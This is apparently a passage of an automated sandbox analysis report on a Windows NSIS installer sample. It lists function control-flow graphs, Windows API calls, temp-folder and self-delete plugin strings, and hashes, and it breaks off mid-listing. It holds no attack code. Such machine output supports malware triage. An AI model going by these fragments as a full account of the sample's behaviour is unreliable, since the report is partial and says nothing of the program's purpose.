                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Del$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 606308-2615572121
                                        • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                        • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 222 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 225 4030d2-4030d7 222->225 226 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 222->226 227 4032b2-4032b6 225->227 234 403110 226->234 235 4031f5-403203 call 40301e 226->235 237 403115-40312c 234->237 241 403205-403208 235->241 242 403258-40325d 235->242 239 403130-403139 call 4034d4 237->239 240 40312e 237->240 248 40325f-403267 call 40301e 239->248 249 40313f-403146 239->249 240->239 244 40320a-403222 call 4034ea call 4034d4 241->244 245 40322c-403256 GlobalAlloc call 4034ea call 4032b9 241->245 242->227 244->242 268 403224-40322a 244->268 245->242 273 403269-40327a 245->273 248->242 253 4031c2-4031c6 249->253 254 403148-40315c call 406002 249->254 258 4031d0-4031d6 253->258 259 4031c8-4031cf call 40301e 253->259 254->258 271 40315e-403165 254->271 264 4031e5-4031ed 258->264 265 4031d8-4031e2 call 406a38 258->265 259->258 264->237 272 4031f3 264->272 265->264 268->242 268->245 271->258 277 403167-40316e 271->277 272->235 274 403282-403287 273->274 275 40327c 273->275 278 403288-40328e 274->278 275->274 277->258 279 403170-403177 277->279 278->278 280 403290-4032ab SetFilePointer call 406002 278->280 279->258 281 403179-403180 279->281 285 4032b0 280->285 281->258 282 403182-4031a2 281->282 282->242 284 4031a8-4031ac 282->284 286 4031b4-4031bc 284->286 287 4031ae-4031b2 284->287 285->227 286->258 288 4031be-4031c0 286->288 287->272 287->286 288->258
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403093
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4hIPvzV6a2.exe,00000400), ref: 004030AF
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 004030FB
                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4hIPvzV6a2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-3459854519
                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 353 4032b9-4032d0 354 4032d2 353->354 355 4032d9-4032e2 353->355 354->355 356 4032e4 355->356 357 4032eb-4032f0 355->357 356->357 358 403300-40330d call 4034d4 357->358 359 4032f2-4032fb call 4034ea 357->359 363 4034c2 358->363 364 403313-403317 358->364 359->358 365 4034c4-4034c5 363->365 366 40346d-40346f 364->366 367 40331d-403366 GetTickCount 364->367 370 4034cd-4034d1 365->370 368 403471-403474 366->368 369 4034af-4034b2 366->369 371 4034ca 367->371 372 40336c-403374 367->372 368->371 373 403476 368->373 376 4034b4 369->376 377 4034b7-4034c0 call 4034d4 369->377 371->370 374 403376 372->374 375 403379-403387 call 4034d4 372->375 378 403479-40347f 373->378 374->375 375->363 387 40338d-403396 375->387 376->377 377->363 385 4034c7 377->385 382 403481 378->382 383 403483-403491 call 4034d4 378->383 382->383 383->363 390 403493-40349f call 4060f9 383->390 385->371 389 40339c-4033bc call 406aa6 387->389 395 4033c2-4033d5 GetTickCount 389->395 396 403465-403467 389->396 397 4034a1-4034ab 390->397 398 403469-40346b 390->398 399 403420-403422 395->399 400 4033d7-4033df 395->400 396->365 397->378 403 4034ad 397->403 398->365 401 403424-403428 399->401 402 403459-40345d 399->402 404 4033e1-4033e5 400->404 405 4033e7-40341d MulDiv wsprintfW call 4055dc 400->405 407 40342a-403431 call 4060f9 401->407 408 40343f-40344a 401->408 402->372 409 403463 402->409 403->371 404->399 404->405 405->399 413 403436-403438 407->413 412 40344d-403451 408->412 409->371 412->389 414 403457 412->414 413->398 415 40343a-40343d 413->415 414->371 415->412
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: *B$ >B$ A$ A$... %d%%
                                        • API String ID: 551687249-3801301222
                                        • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                        • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                        • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                        • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 416 401774-401799 call 402dab call 405e9d 421 4017a3-4017b5 call 406557 call 405e26 lstrcatW 416->421 422 40179b-4017a1 call 406557 416->422 427 4017ba-4017bb call 406805 421->427 422->427 431 4017c0-4017c4 427->431 432 4017c6-4017d0 call 4068b4 431->432 433 4017f7-4017fa 431->433 441 4017e2-4017f4 432->441 442 4017d2-4017e0 CompareFileTime 432->442 435 401802-40181e call 406047 433->435 436 4017fc-4017fd call 406022 433->436 443 401820-401823 435->443 444 401892-4018bb call 4055dc call 4032b9 435->444 436->435 441->433 442->441 445 401874-40187e call 4055dc 443->445 446 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 443->446 458 4018c3-4018cf SetFileTime 444->458 459 4018bd-4018c1 444->459 456 401887-40188d 445->456 446->431 478 401869-40186a 446->478 460 402c38 456->460 462 4018d5-4018e0 CloseHandle 458->462 459->458 459->462 466 402c3a-402c3e 460->466 463 4018e6-4018e9 462->463 464 402c2f-402c32 462->464 467 4018eb-4018fc call 406594 lstrcatW 463->467 468 4018fe-401901 call 406594 463->468 464->460 474 401906-4023a7 call 405bb7 467->474 468->474 474->464 474->466 478->456 480 40186c-40186d 478->480 480->445
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,?,00000031), ref: 004017B5
                                        • CompareFileTime.KERNEL32(-00000014,?,Del,Del,00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,?,00000031), ref: 004017DA
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll$Del
                                        • API String ID: 1941528284-2734193482
                                        • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                        • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                        • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                        • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 482 4068db-4068fb GetSystemDirectoryW 483 4068fd 482->483 484 4068ff-406901 482->484 483->484 485 406912-406914 484->485 486 406903-40690c 484->486 488 406915-406948 wsprintfW LoadLibraryExW 485->488 486->485 487 40690e-406910 486->487 487->488
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                        • wsprintfW.USER32 ref: 0040692D
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME
                                        • API String ID: 2200240437-1106614640
                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 489 40248f-4024c0 call 402dab * 2 call 402e3b 496 4024c6-4024d0 489->496 497 402c2f-402c3e 489->497 498 4024d2-4024df call 402dab lstrlenW 496->498 499 4024e3-4024e6 496->499 498->499 502 4024e8-4024f9 call 402d89 499->502 503 4024fa-4024fd 499->503 502->503 507 40250e-402522 RegSetValueExW 503->507 508 4024ff-402509 call 4032b9 503->508 511 402524 507->511 512 402527-402608 RegCloseKey 507->512 508->507 511->512 512->497 514 402933-40293a 512->514 514->497
                                        APIs
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000023,00000011,00000002), ref: 004024DA
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 0040251A
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
                                        • API String ID: 2655323295-2998130390
                                        • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                        • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                        • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                        • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 515 405f2e-405f49 call 406557 call 405ed1 520 405f4b-405f4d 515->520 521 405f4f-405f5c call 406805 515->521 522 405fa7-405fa9 520->522 525 405f6c-405f70 521->525 526 405f5e-405f64 521->526 528 405f86-405f8f lstrlenW 525->528 526->520 527 405f66-405f6a 526->527 527->520 527->525 529 405f91-405fa5 call 405e26 GetFileAttributesW 528->529 530 405f72-405f79 call 4068b4 528->530 529->522 535 405f80-405f81 call 405e72 530->535 536 405f7b-405f7e 530->536 535->528 536->520 536->535
                                        APIs
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                        • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3248276644-3049482934
                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 538 406076-406082 539 406083-4060b7 GetTickCount GetTempFileNameW 538->539 540 4060c6-4060c8 539->540 541 4060b9-4060bb 539->541 542 4060c0-4060c3 540->542 541->539 543 4060bd 541->543 543->542
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00406094
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-678247507
                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 544 4015c6-4015da call 402dab call 405ed1 549 401636-401639 544->549 550 4015dc-4015ef call 405e53 544->550 552 401668-4022fb call 401423 549->552 553 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 549->553 558 4015f1-4015f4 550->558 559 401609-40160c call 405b05 550->559 565 402c2f-402c3e 552->565 553->565 569 401660-401663 553->569 558->559 563 4015f6-4015fd call 405b22 558->563 566 401611-401613 559->566 563->559 574 4015ff-401602 call 405aab 563->574 570 401615-40161a 566->570 571 40162c-401634 566->571 569->565 575 401629 570->575 576 40161c-401627 GetFileAttributesW 570->576 571->549 571->550 579 401607 574->579 575->571 576->571 576->575 579->566
                                        APIs
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                          • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,00000000,000000F0), ref: 00401652
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
                                        • API String ID: 1892508949-2998130390
                                        • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                        • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                        • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                        • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 584 4020dd-4020e9 585 4021a8-4021aa 584->585 586 4020ef-402105 call 402dab * 2 584->586 587 4022f6-4022fb call 401423 585->587 596 402115-402124 LoadLibraryExW 586->596 597 402107-402113 GetModuleHandleW 586->597 593 402c2f-402c3e 587->593 599 402126-402135 call 4069ba 596->599 600 4021a1-4021a3 596->600 597->596 597->599 603 402170-402175 call 4055dc 599->603 604 402137-40213d 599->604 600->587 609 40217a-40217d 603->609 605 402156-402166 604->605 606 40213f-40214b call 401423 604->606 611 40216b-40216e 605->611 606->609 617 40214d-402154 606->617 609->593 612 402183-40218d call 403bc9 609->612 611->609 612->593 616 402193-40219c FreeLibrary 612->616 616->593 617->609
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
